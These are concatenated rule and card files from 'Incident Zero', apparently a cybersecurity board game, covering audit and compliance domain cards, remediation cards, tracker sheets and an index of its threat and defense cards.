FINDING: Security operations maturity inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [Security team/training/patching] is [insufficient]
RECOMMENDATION: [Hire/train/increase resources] for [security function]
EFFORT: [Ongoing]
COST: [Varies]

Remediation Actions: - ✓ Hire CISO (if missing) - ✓ Establish security team - ✓ Regular vulnerability scanning - ✓ Patch management program - ✓ Security awareness training

Impact if Failed (1-2 stars): - Security functions are reactive (not proactive) - Incident Response: -1 to Investigation rolls (canonical modifier) - Disaster Recovery: -5 DR budget penalty (forensic investigation slow) - Vulnerabilities accumulate (PT-10 Zero-Day risk increases)


Audit Domain Summary

Domain Focus Critical Finding Remediation Effort Compliance Impact
DOMAIN-01 Network Segmentation Flat network Moderate (2-4 wk) Lateral movement prevented
DOMAIN-02 Access Control No MFA Low (2-4 wk) Credential attacks harder
DOMAIN-03 Threat Detection No SIEM High (4-8 wk) Breach detection enabled
DOMAIN-04 Backup & DR No backups Moderate (2-4 wk) Ransomware resilience
DOMAIN-05 Vendor Risk No assessment Low (3-6 wk) Supply chain risk managed
DOMAIN-06 Security Ops No security team High (ongoing) Sustained security posture

Audit Scoring & Findings

Standard Audit Report Format

AUDIT REPORT - [Organization Name]
Audit Date: [Date]
Domains Assessed: 6
Overall Score: 2/6 PASS (stars are flavor: 1-2* = FAIL, 3*+ = PASS)

DOMAIN SCORES:
1. Network Segmentation: ⭐⭐ (2 stars) - FAIL
2. Access Control: ⭐⭐⭐ (3 stars) - PASS
3. Threat Detection: ⭐ (1 star) - FAIL (CRITICAL)
4. Backup & DR: ⭐⭐ (2 stars) - FAIL
5. Vendor Risk: ⭐⭐ (2 stars) - FAIL
6. Security Ops: ⭐⭐⭐⭐ (4 stars) - PASS

CRITICAL FINDINGS (must fix immediately):
- No SIEM or threat monitoring
- Network is completely flat (no segmentation)

MAJOR FINDINGS (fix within 30 days):
- No backup strategy
- Vendor security not assessed
- MFA not implemented

MINOR FINDINGS (fix within 90 days):
- Security training curriculum needs update

RECOMMENDATIONS:
1. Deploy SIEM immediately (critical)
2. Implement network segmentation
3. Establish backup program
4. Implement MFA
5. Develop vendor management program

Modifiers for Other Modules (generated from the canonical table in docs/rules/module-audit-compliance.md, v2.2)

Incident Response Modifiers

For each failed domain (FAIL = 1-2 stars): one -1 modifier.

Failed Domain IR Modifier
DOMAIN-01 Segmentation -1 to NETWORK defenses
DOMAIN-02 Identity -1 to CREDENTIAL_ABUSE defenses
DOMAIN-03 Detection -1 to Investigation rolls
DOMAIN-04 Backup None (matters in DR)
DOMAIN-05 Vendor/Cloud -1 to WEB_EXPLOIT defenses
DOMAIN-06 Security Ops -1 to Investigation rolls

Example: if 3 domains fail, IR carries three separate -1 modifiers.

Disaster Recovery Modifiers

For each failed domain (FAIL = 1-2 stars): a penalty subtracted from the DR starting budget.

Failed Domain DR Budget Penalty
DOMAIN-01 Segmentation -10
DOMAIN-02 Identity -15
DOMAIN-03 Detection -10
DOMAIN-04 Backup -25
DOMAIN-05 Vendor/Cloud -20
DOMAIN-06 Security Ops -5

Cap (v2.2): the total gap penalty applied to a subsequent module's budget is capped at -30.

Example (real budgets: DR starts at 50, IR at 100): if all 6 domains fail, the raw penalty is -85, capped at -30 — the team enters Disaster Recovery with 50 - 30 = 20 Budget.


Gameplay Notes

Playing Audit Standalone

  1. Assess all 6 domains
  2. Score each domain (1-5 stars)
  3. Record findings
  4. Compile audit report
  5. Game ends: Audit complete, recommendations provided

Playing Audit as Module Lead-In

  1. Play Audit first (establish baseline)
  2. Get audit report with findings
  3. Play Incident Response (audit failures become modifiers)
  4. Play Disaster Recovery (audit failures increase costs)
  5. Narrative: Poor audit = harder subsequent modules

Audit Remediation Follow-Up (Optional)

  1. After audit report, teams can remediate findings
  2. Spend Budget to fix findings
  3. Re-assess domain (did remediation work?)
  4. Update modifiers for downstream modules

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by domain function:
  3. Blue (Infrastructure): DOMAIN-01 (Segmentation)
  4. Purple (Access): DOMAIN-02 (Identity)
  5. Red (Detection): DOMAIN-03 (Detection)
  6. Green (Resilience): DOMAIN-04 (Backup)
  7. Orange (Supply Chain): DOMAIN-05 (Vendor)
  8. Yellow (Operations): DOMAIN-06 (Ops)
  9. Include assessment rubric (1-5 star descriptions and the star → PASS/FAIL mapping)
  10. Include finding templates on back of card
  11. Cut along dotted lines
  12. Audit scoring reference card: see print pack (coming)

Audit & Compliance Module: Audit Domain Assessment Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/audit-compliance/expansion-deck/compliance-frameworks.md

Audit & Compliance Module: Compliance Frameworks & Remediation (Expansion)

Version: 2.2 - Playtest Edition Last Updated: October 2025


Overview

Compliance Framework Cards extend the Audit & Compliance module with industry-specific and regulation-specific assessment frameworks beyond the generic 6-domain audit.


Compliance Framework Variants

Organizations must often comply with specific regulatory frameworks. Each framework has slightly different focuses and requirements.


NIST Cybersecurity Framework (5 cards)

Relevance: US Federal government, critical infrastructure, government contractors Key Standard: NIST CSF (Cybersecurity Framework) 5 functions

FRAMEWORK-NIST-01: Identify Function

Framework: NIST CSF Function: Identify (AM - Asset Management, RM - Risk Management) Focus: Knowing what systems/data you have and what risks they face

Assessment Criteria: - Asset inventory (what systems exist?) - Data classification (what data is sensitive?) - Risk assessment (what could go wrong?) - Threat intelligence (what are realistic threats?)

Scoring (1-5 stars): - ⭐ (1): No asset inventory, no risk assessment - ⭐⭐ (2): Partial inventory, informal risk assessment - ⭐⭐⭐ (3): Complete inventory, documented risk assessment - ⭐⭐⭐⭐ (4): Inventory regularly updated, risk assessment reviewed annually - ⭐⭐⭐⭐⭐ (5): Real-time asset visibility, continuous risk assessment

Typical Findings: - Unknown systems (shadow IT) - Unclassified data (don't know what's sensitive) - Missing risk assessment - Risk assessment not updated

Remediation: - Discovery tools (find all systems) - Data classification policy - Annual risk assessment - Asset management system


FRAMEWORK-NIST-02: Protect Function

Framework: NIST CSF Function: Protect (PR.AC - Identity Management & Access Control, PR.AT - Awareness & Training, PR.DS - Data Security, PR.IP - Information Protection Processes, PR.MA - Maintenance, PR.PT - Protective Technology) Focus: Building security controls to prevent/slow attacks

Assessment Criteria: - Access controls (only authorized users) - Employee training (security awareness) - Data protection (encryption, classification) - Information protection (DLP, data loss prevention) - Business continuity (backup, disaster recovery)

Scoring (1-5 stars): - ⭐ (1): No controls - ⭐⭐ (2): Basic controls (passwords) - ⭐⭐⭐ (3): Good controls (MFA, encryption) - ⭐⭐⭐⭐ (4): Strong controls (defense-in-depth) - ⭐⭐⭐⭐⭐ (5): Excellent controls (comprehensive, tested)

Typical Findings: - Weak authentication (no MFA) - Poor training (phishing success rate >10%) - Unencrypted data - No backup strategy - Defense gaps

Remediation: - MFA deployment - Security training program - Encryption implementation - Backup/DR strategy - Penetration testing


FRAMEWORK-NIST-03: Detect Function

Framework: NIST CSF Function: Detect (AE - Anomalies & Events, CM - Continuous Monitoring) Focus: Detecting attacks as they happen

Assessment Criteria: - Log monitoring (are suspicious activities logged?) - Anomaly detection (is suspicious behavior caught?) - Continuous monitoring (24/7 surveillance) - Alert procedures (who responds to alerts?) - Threat intelligence integration (using threat data)

Scoring (1-5 stars): - ⭐ (1): No logging, no monitoring - ⭐⭐ (2): Logging exists, limited monitoring - ⭐⭐⭐ (3): SIEM deployed, some alerts - ⭐⭐⭐⭐ (4): SIEM with good rules, 24/7 monitoring - ⭐⭐⭐⭐⭐ (5): Mature SOC, threat intelligence integrated

Typical Findings: - No SIEM deployed - Alerts not reviewed - No 24/7 monitoring - Response time too slow - Threat intel not integrated

Remediation: - SIEM deployment - Alert rule tuning - SOC staffing (24/7 coverage) - Response procedures - Threat intel integration


FRAMEWORK-NIST-04: Respond Function

Framework: NIST CSF Function: Respond (RS.RP - Response Planning, RS.CO - Communications, RS.AN - Analysis, RS.MI - Mitigation, RS.IM - Improvements) Focus: Responding to breaches/attacks

Assessment Criteria: - Incident response plan (documented procedures) - Response team (trained, staffed) - Communication plan (who gets told when) - Investigation procedures (forensics) - Post-incident review (lessons learned)

Scoring (1-5 stars): - ⭐ (1): No incident response plan - ⭐⭐ (2): Plan exists, not tested - ⭐⭐⭐ (3): Plan exists, annual testing - ⭐⭐⭐⭐ (4): Plan regularly tested, team trained - ⭐⭐⭐⭐⭐ (5): Mature response, regular exercises, continuous improvement

Typical Findings: - No incident response plan - Response team not trained - No communication plan - Investigation procedures unclear - No post-incident reviews

Remediation: - Incident response plan development - Team training - Communication procedures - Tabletop exercises - Post-incident review process


FRAMEWORK-NIST-05: Recover Function

Framework: NIST CSF Function: Recover (RC.RP - Recovery Planning, RC.IM - Improvements, RC.CO - Communications) Focus: Recovering from breaches and improving for next time

Assessment Criteria: - Recovery plan (how to restore systems) - Recovery time objectives (RTO - how fast?) - Recovery point objectives (RPO - how much data loss?) - Backup verification (can you actually restore?) - Lessons learned process (improve after incident)

Scoring (1-5 stars): - ⭐ (1): No recovery plan, no backups - ⭐⭐ (2): Backup exists, recovery not tested - ⭐⭐⭐ (3): Recovery plan exists, tested annually - ⭐⭐⭐⭐ (4): Recovery plan regularly tested, RPO/RTO defined - ⭐⭐⭐⭐⭐ (5): Mature recovery, tested regularly, continuous improvement

Typical Findings: - No recovery plan - Backups untested (may not restore) - RTO/RPO not defined - Recovery team not trained - No lessons learned process

Remediation: - Recovery plan development - Backup testing (quarterly) - RTO/RPO definition - Recovery team training - Lessons learned process


CIS Controls (3 cards)

Relevance: General US/Canada, healthcare, financial, government Key Standard: CIS Controls (18 prioritized security controls)

FRAMEWORK-CIS-01: Safeguards 1-6 (Foundations)

Focus: Basic security practices (asset management, access control, data protection, secure configuration)

Assessment Criteria: - Asset management (know what you have) - Access control (least privilege) - Data protection (encryption) - Secure configuration (harden systems) - Detection tools (SIEM, antivirus) - Training (security awareness)


FRAMEWORK-CIS-02: Safeguards 7-13 (Advanced Defenses)

Focus: Advanced controls (incident response, supply chain, defense tools)

Assessment Criteria: - Incident response plan - Supply chain risk - Vulnerability management - Application security - Remote services security - Testing & monitoring - Network segmentation


FRAMEWORK-CIS-03: Safeguards 14-18 (Operations & Governance)

Focus: Operational controls (reporting, awareness, training, testing)

Assessment Criteria: - Security awareness training - Incident reporting - Third-party risk management - Penetration testing - Secure development practices


PCI-DSS (3 cards)

Relevance: Any organization handling payment cards Key Standard: PCI-DSS (Payment Card Industry Data Security Standard)

FRAMEWORK-PCI-01: Infrastructure Security (Requirements 1-4)

Focus: Network and system security for cardholder data

Assessment Criteria: - Firewall configuration - No default credentials - Cardholder data protection - Vulnerability scanning


FRAMEWORK-PCI-02: Access & Operations (Requirements 5-10)

Focus: Access control and operational procedures

Assessment Criteria: - Antivirus/malware protection - Secure system updates - Access control & authentication - Audit trails & logging


FRAMEWORK-PCI-03: Testing & Compliance (Requirements 11-12)

Focus: Testing, monitoring, and compliance management

Assessment Criteria: - Security testing (penetration testing, vulnerability scanning) - Monthly scanning - Annual penetration testing - Security policies - Training - Incident response procedures


Remediation Action Cards (8 cards)

Remediation Cards represent specific actions to address compliance findings. These can be used after an audit to remediate identified gaps.

Budget note (v2.2): these cards are the only place the Audit module's starting Budget (100, per core rules) is spent — the assessment itself costs nothing.

REMEDIATION-01: Implement MFA

Cost: 5 Budget Timeline: 2-4 weeks Difficulty: Low-Medium

What it does: - Deploy multi-factor authentication for all user access - Implement MFA for VPN, remote access, email, admin access - Select authentication method (authenticator app, hardware token, SMS)

Prerequisites: - Identity management system (Domain Controller, Azure AD) - User device (phone or security key) - Application/system support for MFA

Impact: - Reduces DOMAIN-02 (Access Control) findings - Makes credential attacks (T-03, T-06) harder - Improves Incident Response and Disaster Recovery modifiers


REMEDIATION-02: Deploy SIEM

Cost: 15 Budget Timeline: 4-8 weeks Difficulty: Medium

What it does: - Deploy Security Information & Event Management (SIEM) - Configure log collection from all systems - Create alert rules for suspicious activity - Implement 24/7 monitoring

Prerequisites: - Centralized logging infrastructure - SIEM software/service (Splunk, ELK, QRadar, Azure Sentinel) - Security personnel to manage SIEM

Impact: - Reduces DOMAIN-03 (Threat Detection) findings - Enables early breach detection - Improves Incident Response investigation - Provides audit trail for compliance


REMEDIATION-03: Implement Network Segmentation

Cost: 12 Budget Timeline: 4-6 weeks Difficulty: Medium-High

What it does: - Divide network into security zones (DMZ, internal, admin) - Deploy firewalls between zones - Configure firewall rules for inter-zone traffic - Implement VLANs and network isolation

Prerequisites: - Network switches/routers capable of VLAN support - Firewall(s) for inter-zone traffic - Network diagram and access requirements

Impact: - Reduces DOMAIN-01 (Network Segmentation) findings - Prevents lateral movement (T-04 becomes harder) - Improves Disaster Recovery (limits blast radius) - Foundational for zero-trust architecture


REMEDIATION-04: Backup & Disaster Recovery

Cost: 10 Budget Timeline: 2-4 weeks Difficulty: Low-Medium

What it does: - Implement 3-2-1 backup strategy (3 copies, 2 media, 1 offsite) - Configure automated backups - Test backup restoration (quarterly) - Document recovery procedures

Prerequisites: - Backup software/service - Off-site storage location - Testing schedule

Impact: - Reduces DOMAIN-04 (Backup & DR) findings - Enables ransomware recovery - Improves Disaster Recovery (reduces costs) - Supports compliance requirements


REMEDIATION-05: Security Training Program

Cost: 3 Budget Timeline: 1-2 weeks (ongoing) Difficulty: Low

What it does: - Develop security awareness training curriculum - Conduct initial training for all employees - Implement phishing simulations - Quarterly refresher training

Prerequisites: - Training development (internal or vendor) - Management buy-in (release time for employees)

Impact: - Reduces DOMAIN-06 (Security Ops) findings - Reduces phishing success rate - Improves overall security culture - Compliance requirement (most frameworks)


REMEDIATION-06: Vendor Security Assessment

Cost: 5 Budget Timeline: 2-4 weeks Difficulty: Low-Medium

What it does: - Develop vendor security questionnaire - Send questionnaires to key vendors - Review vendor security controls - Document vendor risk assessment - Establish SLAs with security requirements

Prerequisites: - Vendor list and criticality assessment - Security questionnaire template - Document review process

Impact: - Reduces DOMAIN-05 (Third-Party Risk) findings - Identifies supply chain risks - Prevents SCENARIO-03 (Supply Chain Compromise) - Compliance requirement (GDPR, etc.)


REMEDIATION-07: Vulnerability Management Program

Cost: 8 Budget Timeline: 3-4 weeks Difficulty: Medium

What it does: - Deploy vulnerability scanning tools - Establish patching procedures - Configure patch management automation - Document vulnerability remediation process

Prerequisites: - Vulnerability scanner (Nessus, Qualys, OpenVAS) - Patch management tools or procedures - Prioritization process (critical vs. non-critical)

Impact: - Reduces multiple audit findings - Prevents PT-05 (Privilege Escalation via unpatched kernel) - Improves overall security posture


REMEDIATION-08: Incident Response Plan & Team

Cost: 12 Budget Timeline: 4-6 weeks (plus ongoing) Difficulty: Medium-High

What it does: - Develop incident response plan (procedures, contacts, escalation) - Establish incident response team - Conduct tabletop exercises - Implement communication procedures

Prerequisites: - Team designation (CISO, security analysts, IT, legal, PR) - Plan documentation - Training and exercises

Impact: - Reduces DOMAIN-03 (Threat Detection) and DOMAIN-06 (Security Ops) findings - Enables faster response to Incident Response module - Improves Disaster Recovery effectiveness - Compliance requirement (nearly universal)


Using Compliance Frameworks in Gameplay

Standalone Compliance Assessment

  1. Choose one framework (e.g., NIST CSF, CIS Controls, PCI-DSS)
  2. Assess each requirement
  3. Score and document findings
  4. Develop remediation roadmap
  5. Game ends: Compliance report delivered

Framework-Specific Play

Remediation Roadmap

  1. After audit, teams identify high-priority findings
  2. Allocate budget to remediation actions
  3. Spend Budget to fix findings
  4. Re-assess after remediation
  5. Track compliance journey

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Framework color-coding:
  3. Blue (NIST): FRAMEWORK-NIST-01 to FRAMEWORK-NIST-05
  4. Orange (CIS): FRAMEWORK-CIS-01 to FRAMEWORK-CIS-03
  5. Red (PCI): FRAMEWORK-PCI-01 to FRAMEWORK-PCI-03
  6. Green (Remediation): REMEDIATION-01 to REMEDIATION-08
  7. Include assessment rubric (1-5 stars) on each framework card
  8. Include cost/timeline/difficulty on remediation cards
  9. Cut along dotted lines

Possible Expansion: Additional Frameworks


Audit & Compliance Module: Compliance Frameworks & Remediation (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/print-templates/tracker-sheets.md

Tracker Sheets (Print & Play)

Version: 2.2 - Playtest Edition

Print on plain A4. One Universal Sheet per table, plus the module sheet for the module you're playing. Tip: laminate and use a dry-erase marker, or move a coin/token along the tracks.


Universal Tracker Sheet (all modules)

Turn Track

Cross off as each turn ends. Circle your turn limit before starting.

 1   2   3   4   5   6   7   8   9   10   11   12   13   14   15   16
[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]  [ ]  [ ]  [ ]  [ ]  [ ]  [ ]  [ ]

Budget Track

Start at your module's budget (Network Building 40-60 · Disaster Recovery 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150). Tick down in 5s.

150 145 140 135 130 125 120 115 110 105 100  95  90  85  80  75
 70  65  60  55  50  45  40  35  30  25  20  15  10   5   0

Reputation / Score Track (0-100)

100  95  90  85  80  75  70  65  60  55  50  45  40  35  30  25  20  15  10  5  0

Uncontained Threats (Incident Response)

 0   1   2   3   4   5
[ ] [ ] [ ] [ ] [ ] [ ]      Penalty at start of turn: -5 Budget each

Forensics Module Sheet — Progress Meters

Advance each meter per card effects. Victory thresholds marked ▲.

ATTRIBUTION      0   10   20   30   40   50   60   70   80   90▲  100
TIMELINE         0   10   20   30   40   50   60   70   80▲  90   100
ATTACK CHAIN     0   10   20   30   40   50   60   70   80▲  90   100
CHAIN OF CUSTODY 0   10   20   30   40   50   60   70▲  80   90   100

Victory check (end of game): - V1 Full Attribution: Attribution ≥90 AND Timeline ≥80 - V2 Solid Case: Timeline ≥80 AND Attack Chain ≥80 AND Chain of Custody ≥70 - V3 Partial Findings: any two meters ≥70

Investigation in flight: ____ (results arrive Turn _) Evidence collected (✓ = Analyzed, one Analyze per card):

Evidence card Documented? (+5% CoC) Analyzed?

Disaster Recovery Module Sheet

Crisis Progress Tracks

INVESTIGATION   0   10   20   30   40   50   60   70   80   90   100
REMEDIATION     0   10   20   30   40   50   60   70   80   90   100
COMMUNICATION   0   10   20   30   40   50   60   70   80   90   100

Stakeholder Trust (0-100%; any stakeholder at 0% = company collapses)

Stakeholder 100 80 60 40 20 (critical) 0 (LOSS)
Customers
Employees
Regulators
Board / Investors
Media / Public

Deadline Timeline (mark scheduled events at setup)

Turn 1 2 3 4 5 6 7 8
Scheduled event
Deadline Customers notified (recommended) Regulator penalties begin GDPR 72h — regulators notified

Multi-turn action in flight: ____ (completes Turn _)


Audit & Compliance Module Sheet — Scoring Worksheet

# Domain Stars (1-5) PASS (3★+) / FAIL (1-2★) Key gap found
1 Network Segmentation
2 Identity & Access
3 Detection & Monitoring
4 Backup & Recovery
5 Cloud Security
6 Security Operations

Result: ___ / 6 PASS — Gap penalties for follow-on modules: see module rules (total capped at -30).


Network Building Module Sheet — Score Sheet

Category Points Notes
Requirements met per requirement card
Security coverage per rules scoring table
Capability coverage per rules scoring table
Budget management per rules scoring table
TOTAL

Components placed:

Component Cost Capacity used / total

Budget remaining: ___ / starting ___

cards/CARD_REFERENCE.md

Incident Zero: Card Reference Index

Version 2.2 - Playtest Edition

Complete index of all cards across all six modules. This index is generated from the card files themselves — the card files under each module folder are the canonical source of truth. If this index ever disagrees with a card file, the card file wins.

Total: 247 cards across 6 modules (the 24-card shared Defense deck is counted once).


Quick Navigation


Incident Response Module

Module total: 63 cards (12 core threats + 24 shared defenses + 8 expansion threats + 19 expansion defenses).

Deck File Card IDs Count Description
Core Threats threat-defense-cards.md T-01 – T-12 12 Attack chain steps for the Threat Orchestrator, organized by kill chain phase
Core Defenses (shared) threat-defense-cards.md D-01 – D-24 24 Shared with Hardening — see Shared Defense Deck
Expansion Threats advanced-threats.md T-13 – T-20 8 Supply chain, insider, IoT, cloud, DNS tunneling, and physical attacks
Expansion Defenses advanced-defenses.md D-25 – D-43 19 Whitelisting, behavioral analytics, container/cloud security, playbooks, backup/DR

Core Threat Deck (T-01 – T-12)

Card ID Title Step Vector
T-01 Phishing Campaign INITIAL COMPROMISE SOCIAL ENGINEERING
T-02 Watering Hole Attack INITIAL COMPROMISE WEB EXPLOIT
T-03 Compromised Credentials INITIAL COMPROMISE CREDENTIAL ABUSE
T-04 Lateral Movement via SMB PIVOT & ESCALATE NETWORK
T-05 Privilege Escalation via Kernel Exploit PIVOT & ESCALATE MALWARE
T-06 Mimikatz Credential Dumping PIVOT & ESCALATE CREDENTIAL ABUSE
T-07 Scheduled Task Persistence PERSISTENCE MALWARE
T-08 Registry Run Key Persistence PERSISTENCE MALWARE
T-09 Beaconing to C2 Server C2 & EXFIL NETWORK
T-10 SQL Database Exfiltration C2 & EXFIL DATA EXFIL
T-11 Ransomware Payload Deployment C2 & EXFIL MALWARE
T-12 Browser Extension Backdoor C2 & EXFIL DATA EXFIL

By step: INITIAL COMPROMISE 3 (T-01–03) · PIVOT & ESCALATE 3 (T-04–06) · PERSISTENCE 2 (T-07–08) · C2 & EXFIL 4 (T-09–12).

Expansion Threat Deck (T-13 – T-20)

Card ID Title Step Vector
T-13 Compromised Software Vendor Update INITIAL COMPROMISE MALWARE
T-14 Malicious Third-Party Library Injection INITIAL COMPROMISE MALWARE
T-15 Malicious Insider Data Theft C2 & EXFIL DATA EXFIL
T-16 Disgruntled Employee Sabotage PIVOT & ESCALATE MALWARE
T-17 Compromised IoT Device as Pivot Point INITIAL COMPROMISE NETWORK
T-18 Cloud API Token Theft & Abuse PIVOT & ESCALATE CREDENTIAL ABUSE
T-19 DNS Tunneling Data Exfiltration C2 & EXFIL DATA EXFIL
T-20 Physical Access + Badge Cloning Attack INITIAL COMPROMISE CREDENTIAL ABUSE

Expansion Defense Deck (D-25 – D-43)

Distribution: 4 BASIC (10 Budget) / 8 ADVANCED (15 Budget) / 7 ELITE (25 Budget).

Card ID Title Tier (Cost) Vector
D-25 Application Whitelisting BASIC (10) MALWARE
D-26 Advanced Application Control with AI ADVANCED (15) MALWARE
D-27 Living-Off-The-Land Blocker ELITE (25) MALWARE
D-28 Baseline Behavior Learning System ADVANCED (15) NETWORK
D-29 Process Behavior Analysis ADVANCED (15) MALWARE
D-30 Machine Learning Anomaly Detection ELITE (25) MALWARE
D-31 Container Image Scanning BASIC (10) MALWARE
D-32 Container Runtime Protection ADVANCED (15) MALWARE
D-33 Kubernetes Network Policy & RBAC ELITE (25) NETWORK
D-34 Cloud Configuration Auditing BASIC (10) CREDENTIAL ABUSE
D-35 Cloud Access & Permission Auditing ADVANCED (15) CREDENTIAL ABUSE
D-36 Cloud Compliance & Audit Trail ELITE (25) DATA EXFIL
D-37 Playbook: Ransomware Response ADVANCED (15) MALWARE
D-38 Playbook: Credential Compromise Response ADVANCED (15) CREDENTIAL ABUSE
D-39 Playbook: Insider Threat Response ELITE (25) DATA EXFIL
D-40 Playbook: Supply Chain Breach Response ELITE (25) WEB EXPLOIT
D-41 Backup Strategy - 3-2-1 Rule BASIC (10) MALWARE
D-42 Immutable Backup Storage ADVANCED (15) MALWARE
D-43 Disaster Recovery Plan & Testing ELITE (25) MALWARE

Shared Defense Deck (IR + Hardening)

24 cards (D-01 – D-24), indexed once. The same deck appears in full in both module folders:

Print one physical set and use it in both modules.

Distribution by tier (v2.2): 8 BASIC (D-01–06, D-19, D-23) / 8 ADVANCED (D-07–12, D-18, D-24) / 8 ELITE (D-13–17, D-20–22).

Card ID Title Tier (Cost) Vector
D-01 Email Authentication Setup BASIC (10) SOCIAL ENGINEERING
D-02 User Security Training BASIC (10) SOCIAL ENGINEERING
D-03 Windows Update Patching BASIC (10) WEB EXPLOIT
D-04 Network Firewall Rules BASIC (10) NETWORK
D-05 Log Centralization BASIC (10) MALWARE
D-06 Basic Antivirus Deployment BASIC (10) MALWARE
D-07 Multi-Factor Authentication (MFA) ADVANCED (15) CREDENTIAL ABUSE
D-08 EDR (Endpoint Detection & Response) ADVANCED (15) MALWARE
D-09 Network Segmentation ADVANCED (15) NETWORK
D-10 SIEM Correlation Rules ADVANCED (15) NETWORK
D-11 Data Loss Prevention (DLP) ADVANCED (15) DATA EXFIL
D-12 Password Manager & Vault ADVANCED (15) CREDENTIAL ABUSE
D-13 Threat Hunting Program ELITE (25) MALWARE
D-14 Memory Forensics ELITE (25) MALWARE
D-15 Deception Technology (Honeypots) ELITE (25) NETWORK
D-16 Credential Guard & Secure Boot ELITE (25) CREDENTIAL ABUSE
D-17 Advanced Malware Sandbox ELITE (25) MALWARE
D-18 Intrusion Prevention System (IPS) ADVANCED (15) WEB EXPLOIT
D-19 Backup & Disaster Recovery BASIC (10) MALWARE
D-20 Zero Trust Access Control ELITE (25) CREDENTIAL ABUSE
D-21 Container Security & Orchestration ELITE (25) MALWARE
D-22 Security Information & Event Management (SIEM) ELITE (25) NETWORK
D-23 IR Program & Runbooks BASIC (10) NETWORK
D-24 Threat Intelligence Integration ADVANCED (15) NETWORK + DATA EXFIL (dual-tagged)

Distribution by vector (v2.2): SOCIAL ENGINEERING 2 · WEB EXPLOIT 2 · CREDENTIAL ABUSE 4 · MALWARE 8 · NETWORK 7 · DATA EXFIL 2. D-24 is dual-tagged (NETWORK + DATA EXFIL), so vector tags sum to 25 across 24 cards.


Hardening Module

Module total: 16 tactic cards + the Shared Defense Deck (24 cards, indexed above).

Deck File Card IDs Count Description
Defense Cards (shared) defense-cards.md D-01 – D-24 24 Same deck as IR core — see Shared Defense Deck
Core Pentester Tactics pentester-tactic-cards.md PT-01 – PT-08 8 Red-team tactics that test deployed defenses (d20 vs DC)
Expansion Tactics advanced-tactics.md PT-09 – PT-16 8 Multi-vector, zero-day, ransomware, APT, cloud/IoT/firmware/container attacks

Core Pentester Tactic Deck (PT-01 – PT-08)

Card ID Title Difficulty (DC) Target Vectors
PT-01 Social Engineering - Pretexting Attack BASIC (DC 12) SOCIAL_ENGINEERING, CREDENTIAL_ABUSE
PT-02 Malware Evasion - Living-off-the-Land Technique INTERMEDIATE (DC 13) MALWARE, CREDENTIAL_ABUSE
PT-03 Credential Dumping - Mimikatz Attack INTERMEDIATE (DC 13) CREDENTIAL_ABUSE, MALWARE
PT-04 Lateral Movement - Network Traversal INTERMEDIATE (DC 13) NETWORK, CREDENTIAL_ABUSE
PT-05 Privilege Escalation - Unpatched Kernel Exploit ADVANCED (DC 14) MALWARE, WEB_EXPLOIT
PT-06 Data Exfiltration - Unmonitored Channel ADVANCED (DC 14) DATA_EXFIL, NETWORK
PT-07 Supply Chain Compromise - Trusted Software Update ADVANCED (DC 14) MALWARE, WEB_EXPLOIT
PT-08 Insider Threat - Malicious Administrator EXPERT (DC 15) CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK

Expansion Tactic Deck (PT-09 – PT-16)

Card ID Title Difficulty (DC) Target Vectors
PT-09 Multi-Vector Attack - Coordinated Campaign ADVANCED (DC 14) Multiple (per-phase rolls)
PT-10 Zero-Day Exploitation - Unknown Vulnerability EXPERT (DC 15) MALWARE, WEB_EXPLOIT
PT-11 Ransomware Deployment & Encryption EXPERT (DC 15) MALWARE, DATA_EXFIL, NETWORK
PT-12 APT Campaign - Multi-Turn Persistent Threat EXPERT+ (DC 16, escalates +1/turn undetected) Multiple
PT-13 Cloud-Specific Attack - Misconfigured Cloud Resources ADVANCED (DC 14) Multiple
PT-14 IoT/OT Compromise - Industrial Network Attack ADVANCED (DC 14) NETWORK, MALWARE
PT-15 Firmware/BIOS Attack - Bootloader Compromise EXPERT (DC 15) MALWARE, NETWORK
PT-16 Privilege Escalation - Containerized Environment Escape EXPERT (DC 15) MALWARE, NETWORK

Network Building Module

Module total: 77 cards (33 core + 8 expansion + 36 standalone).

Deck File Card IDs Count Description
Servers server-cards.md SRV-01 – SRV-10 10 Server types with cost, capacity, complexity, and availability
Security Devices security-device-cards.md SEC-01 – SEC-10 10 Security appliances with cost, vectors covered, and placement
Architectures architecture-cards.md ARCH-01 – ARCH-05 5 Network topology choices with cost/complexity trade-offs
Assets asset-cards.md ASSET-01 – ASSET-08 8 Business functions the network must support
Legacy Systems (exp.) legacy-systems.md LEGACY-01 – LEGACY-04 4 Unpatched, mission-critical legacy burdens
Cloud Variants (exp.) cloud-variants.md CLOUD-01 – CLOUD-04 4 Modern cloud deployment alternatives
Business Requirements (standalone) business-requirement-cards.md REQ-01 – REQ-20 20 Draw-deck requirements for standalone play
Operational Events (standalone) operational-event-cards.md EVT-01 – EVT-16 16 Draw-deck operational events for standalone play

Server Cards (SRV-01 – SRV-10)

Card ID Title Cost Key Risk
SRV-01 Email Server 8 Phishing, Credential Abuse
SRV-02 Web Server 7 Web Exploits, RCE
SRV-03 Database Server 10 SQL Injection, Data Exfil
SRV-04 File Server 6 SMB Laterals, Ransomware
SRV-05 Domain Controller 12 Mimikatz, Complete Compromise
SRV-06 Development Server 5 Lateral Movement, Data Leak
SRV-07 Backup Server 9 Ransomware, Recovery Failure
SRV-08 Cloud Workload 4 Misconfiguration, IAM Abuse
SRV-09 Legacy System 3 Known Vulns, Cannot Patch
SRV-10 Honeypot Decoy 7 Detection, Early Warning

Security Device Cards (SEC-01 – SEC-10)

Card ID Title Cost Primary Vectors / Placement
SEC-01 Firewall (Perimeter) 12 NETWORK, CREDENTIAL / Perimeter
SEC-02 Intrusion Detection System (IDS) 10 MALWARE, NETWORK / Internal
SEC-03 Intrusion Prevention System (IPS) 14 MALWARE, WEB, NETWORK / Internal
SEC-04 Load Balancer 8 NETWORK (availability) / Web Tier
SEC-05 VPN Gateway 9 CREDENTIAL, NETWORK / Perimeter
SEC-06 Email Gateway 6 SOCIAL_ENG, MALWARE / Perimeter
SEC-07 Web Application Firewall (WAF) 11 WEB, MALWARE / Web Tier
SEC-08 Network Segmentation Switch 10 CREDENTIAL, NETWORK / Internal
